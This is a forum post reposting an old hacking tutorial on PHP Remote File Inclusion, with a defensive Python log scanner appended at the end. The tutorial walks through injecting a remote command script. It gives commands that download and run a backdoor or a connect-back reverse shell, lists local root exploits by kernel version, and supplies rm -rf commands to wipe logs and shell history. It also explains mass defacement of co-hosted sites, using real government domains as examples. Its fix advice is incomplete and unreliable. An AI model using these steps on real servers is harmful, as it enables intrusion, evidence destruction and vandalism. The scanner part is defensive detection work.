Nytro

PHP injection - Access Server


#################

# Not written by me, but by phAnt0mh4ck3r of h4cky0u. It's not that well written, but it sure covers stuff that's need-to-know.

#

1. What is it?

2. How to exploit

3. Help from Google

4. Local exploits

5. Erasing logs

6. How to fix the vulnerability

7. Tools

8. Commands

1. What is it?

The vulnerability is better known as Remote File Inclusion (remote inclusion of files), a bug discovered between 2002 and 2003, but even today many are unaware of it.

The bugs found are, for the most part, in PHP scripts; there are thousands available on the Internet, every day new string bugs are found and published on security sites, and consequently it doesn't take long for thousands of modified sites to appear, and by coincidence, 99% of these used buggy PHP scripts.

But where exactly is this bug? It is found in PHP functions which, combined with a badly written script, make remote file inclusion possible. The most used are:

main(, include(, include_once(, and others, and generally the function that has the bug looks roughly like this:

main($dir."file")

Let's say the file that has this function is called index.php; it is enough for the user to type in his browser: index.php?dir=cmd <- this will be explained further on.

It is a simple error, but one that has caused great losses around the world.

2. How to exploit

Victim: the site whose PHP flaw you are going to exploit.

String: the files on the site susceptible to the attack.

Cmd: a PHP script that lets us type commands to be included in PHP.

Backdoor: opens ports on the system for remote connection 'without authentication'.

Connect Back: opens a specific port for a connection between your PC and the victim.

Exploit: a program that exploits a certain flaw in a system. There are several types of exploits. Here we will deal only with Local Root Exploits (they exploit local flaws that take common users to root access - super-user).

Shell: an interactive command interpreter program that allows the user to interact with the operating system through typed commands.

Telnet: we will use it for remote connections.

Firewall: an intelligent barrier between a local network and the Internet, through which only authorized traffic passes. This traffic is examined by the firewall in real time and the selection is made according to the rule "what is not expressly allowed is forbidden".

root: super-user. He is the admin and has total access to the system.

* Strings

There are several strings available. In this tutorial I will use a very simple one as the example, which is "index.php?page=". In the annex at the end, several others :P

* Syntax

Example:

www.site.com/arquivo.php?data=http://CMD/cmd.gif?&cmd=ls
^           ^                 ^                       ^
Victim      String            CmD                   unix command

* Using the CmD

Cmd = http://www.site.com/cmd.gif?&cmd=

In practice, you insert the cmd into the string.

Example: www.site.com/index.php?page=http://www.site.com/cmd.gif?&cmd=

In the CMD:

sysname: --> Operating system running.

nodename: --> Local name.

release: --> Kernel version.

Script Current User: --> User under which the script is being executed.

PHP Version: --> PHP version of the machine.

User Info: --> User information (uid, euid, gid).

Current Path: --> Current folder you are in on the server.

Server IP: --> IP of the server.

Web server: --> Information about the server.

* Gaining access to a shell

This is the machine's command interpreter. For this you need: a Backdoor and a Connect Back.

* Running a backdoor on the server for remote connection

To run a backdoor, it is enough to upload it, set the permissions, and execute it.

Command: cd /var/tmp; wget www.site.onde.esta.o.backdoor.com/backdoor; chmod 777 backdoor; ./backdoor

cd /var/tmp -> Does the operation in this folder, because it is common to all users and because of its permissions. /tmp also works :)

wget www.(...)/backdoor -> Copies the backdoor from a URL to the site. When wget does not work, try other commands. Syntaxes:

- Possible programs for downloading files:

wget www.site.com/arquivo

lynx -source www.site.com/arquivo > arquivo

curl -o arquivo www.site.com/arquivo

GET www.site.com/arquivo > arquivo

(...)

Now it is enough to connect to the shell. How?

On Windows: Start -> Run -> telnet www.site.com port

Where www.site.com is the name or IP of the site where you ran the backdoor, and port is the port the backdoor is listening on.

If bash-2.05b$ or something similar appears in telnet, it worked! And you have shell access on the machine. If it takes a while and does not drop into a shell, check the name/IP of the server.

If it is correct, a firewall is running. And now? Simple: Connect Back.

* Connect Back

A very efficient method to gain a shell on a machine. It gains the shell in reverse.

Windows: download netcat for Windows and, in the MS-DOS prompt (in the folder where nc is), type: nc -vv -l -p 15, where 15 can be chosen according to your preference. This port will be the one that receives the connection.

Now, going back to the browser, in cmd type the following command:

cd /var/tmp; wget www.site.do.dc.com/dc; chmod 777 dc; ./dc IP port

cd /var/tmp -> Same as for the backdoor.

wget www.site.do.dc.com/dc -> Same, but logically with the address of dc.

./dc IP port -> where IP is YOUR IP and port is the port you chose in netcat.

Once this is done, if everything goes right, the result will appear as:

Connect Back Backdoor

* Dumping Arguments

* Resolving Host Name

* Connecting...

* Spawning Shell

* Detached

This means you are connected to the shell!

If this appears:

Connect Back Backdoor

* Dumping Arguments

* Resolving Host Name

* Connecting...

[-] Unable to Connect

check the data (your IP, port, netcat, etc). If it persists, your network does not accept this type of connection. Try other ports (such as 80, 22, 15, etc).

4. Local exploits

2.4.17 -> newlocal, kmod

2.4.18 -> brk, newlocal, kmod, km.2

2.4.19 -> brk, newlocal, kmod, km.2

2.4.20 -> ptrace, kmod, km.2, brk

2.4.21 -> km.2, brk, ptrace

2.4.22 -> km.2, brk, ptrace

2.4.23 -> mremap_pte

2.4.24 -> mremap_pte, Uselib24

2.4.27 -> Uselib24

2.6.2 -> mremap_pte, krad

2.6.5 to 2.6.10 -> krad, krad2

5. Erasing logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /var/apache/log

rm -rf $HISTFILE

find / -name .bash_history -exec rm -rf {} \;

find / -name .bash_logout -exec rm -rf {} \;

find / -name 'log*' -exec rm -rf {} \;

find / -name '*.log' -exec rm -rf {} \;

6. How to fix the vulnerability

Edit the php.ini file in the configuration folder of your Apache and disable the functions:

system, exec, passthru, shell_exec

7. Tools

You can find some tools on these sites:

- http://mescalin.100free.com

- http://www.packetstormsecurity.org

- http://www.milw0rm.com

- http://www.securiteam.com

8. Commands

ls -> Lists files. It can be combined with -a (shows hidden files) and -l (shows details). Ex.: ls -la (shows the files, including hidden ones, in detail).

uname -a -> Shows system information, such as kernel version, host name, and other useful things.

id -> Shows your id.

w -> Lists the users logged in at the moment.

cp -> Copies files. Syntax: cp arquivo /destino/

mv -> Moves files. Syntax: mv arquivo /destino/

rm -> Removes files. If combined with -rf, removes all the specified files, including folders.

mkdir -> Creates a directory

rmdir -> Removes a directory

find -> Searches for files/folders. Ex.: "find /etc -name httpd.conf" looks for httpd.conf in the /etc folder

pwd -> Shows which folder you are in

cat -> Displays the content of a file on the screen

head -> Displays lines from the beginning of the file

tail -> Displays lines from the end of the file

ctrl+c -> Exits/kills a program

ctrl+r -> Searches for a command typed in the bash history

ps -auxw -> Lists all the processes on the system

netstat -na -> Connection status

kill -9 -> Kills a process. Syntax: kill -9 PID OF THE PROCESS

kill -HUP -> Restarts a process. Syntax: kill -HUP PID OF THE PROCESS

pico -> Text editor. Syntax: pico arquivo

vi -> Same. vi arquivo

Saving results to files

command > /arquivo/onde/sera/armazenado

Ex.: ls /etc > /tmp/s.txt saves the whole result of the listing of /etc in the file /tmp/s.txt

Adding lines to files

echo "line" >> /arquivo/onde/sera/incluido

Unpacking files (most common)

.tar -> tar xvf arquivo.tar

.tar.gz -> tar zxvf arquivo.tar.gz

.tar.bz2 -> tar jxvf arquivo.tar.bz2

.zip -> unzip arquivo.zip

Compressing files (most common)

.tar -> tar cvf destino.tar ARQUIVO

.tar.gz -> tar cvf destino.tar ARQUIVO; gzip destino.tar

.tar.bz2 -> tar cvf destino.tar ARQUIVO; bzip2 destino.tar

.zip -> zip destino.zip ARQUIVO

* List of sites running on the server

* Using the httpd.conf file

Generally the data of the hosted sites is in this file. To make a listing of the sites, it is enough to type a command that reads the httpd.conf file and prints the lines containing ServerName (the names of the sites). (In the folder where httpd.conf is.)

cat httpd.conf | grep ServerName

(They will be in this same file; you can save the result to a file, preferably in the folder of the site you came in through, and download it.)

---->

How? Well, in the CMD, type pwd. You will see where you are on the server. Ex.: /home/httpd/vhosts/nasa.gov/web/

Let's say the URL is this: http://nasa.gov/index.php?page=CMD

Then, if you send the result to /home/httpd/vhosts/nasa.gov/web, this file will be in the root of the site. Just type this command:

cat httpd.conf | grep ServerName > /home/httpd/vhosts/nasa.gov/web/RESULTADO.txt

(only an example)

Once this is done, go to http://nasa.gov/RESULTADO.txt and download the list :P

<----

Now, where is it? GENERALLY in the folders /etc/httpd/conf or /etc/apache/conf, but it varies a lot and it can be found in other places. An efficient, though slow, way to find it is to do a complete search of the system. Command:

find / -name httpd.conf

This prints where httpd.conf is on the server. More than one result may appear.

* Other ways?

If even so you cannot find which sites are there, look for alternative ways. Unfortunately there is no way to explain this, because each server has its own way.

Example:

If you list the folder where the sites are located, the result will already have their name and domain. Ex.: ls /home/httpd/vhosts

site.com

mtv.com.br

nasa.gov

whitehouse.gov

etc

* Making Mass Defacement

Well, first, create the index that you want in place of the others. Once done, put it somewhere from which you can upload it to the server.

Now, the end: change all the others to yours. Simple, one command is enough for this:

find /pasta/onde/estao/os/sites -name "index.*" -exec cp /onde/esta/sua/index.html {} \;

To know where the sites are, just pwd in cmd. Ex.: /home/httpd/vhosts/nasa.gov/web

Note that all the others are in /home/httpd/vhosts.

Upload it the same way as the backdoor: wget http://suaindex.com/sua.index

Let's say you did it to the /tmp folder; then the command would be:

find /home/httpd/vhosts -name "index.*" -exec cp /tmp/index.html {} \;
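Added defensive example, not part of the tutorial above or of any tool it mentions: a small Python script that scans Apache access-log lines for the request shape the tutorial relies on (a query parameter whose value is a remote URL, ending in the "?" that turns the appended "&cmd=" into its own parameter) and pulls out the included URL and the command for triage. The log lines, hostnames and IPs are constructed for the example.

```python
"""Flag Remote File Inclusion attempts in Apache access-log lines.

Added defensive example; the log lines below are constructed, not
taken from any real server."""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: client - - [time] "METHOD target HTTP/x" status ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Schemes include()/require() can fetch when allow_url_include is On,
# plus the php:// and data:// wrappers abused for the same purpose.
_REMOTE = re.compile(r'^(?:https?|ftps?|php|data)://', re.I)

SAMPLE_LOG = [  # constructed; 203.0.113.x / 198.51.100.x are documentation ranges
    '203.0.113.7 - - [10/Oct/2005:13:55:36 +0000] "GET /index.php?page=http://www.site.com/cmd.gif?&cmd=ls HTTP/1.1" 200 2326 "-" "Mozilla/4.0"',
    '198.51.100.2 - - [10/Oct/2005:13:56:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2005:13:57:12 +0000] "GET /arquivo.php?data=http://203.0.113.9/cmd.gif?&cmd=uname%20-a HTTP/1.1" 200 911 "-" "Mozilla/4.0"',
]

def analyse_request(target):
    """Return None, or a dict describing why the request looks like RFI."""
    # keep_blank_values so a bare "cmd=" (no command yet) is still visible
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    remote = [(name, value) for name, value in params if _REMOTE.match(value)]
    if not remote:
        return None
    # The trailing "?" on the injected URL turns whatever the vulnerable
    # script appends into a query string, so "&cmd=..." lands as its own
    # parameter in our log: surface it for the analyst.
    return {"params": remote, "cmd": dict(params).get("cmd")}

def scan_log(lines):
    """Return one finding per log line whose request carries a remote include."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        hit = analyse_request(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "target": m.group("target"), **hit})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} RFI via {f['params'][0][0]}={f['params'][0][1]} cmd={f['cmd']!r}")
```

On the sample above it flags the two requests from 203.0.113.7 and ignores the normal page=news request.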
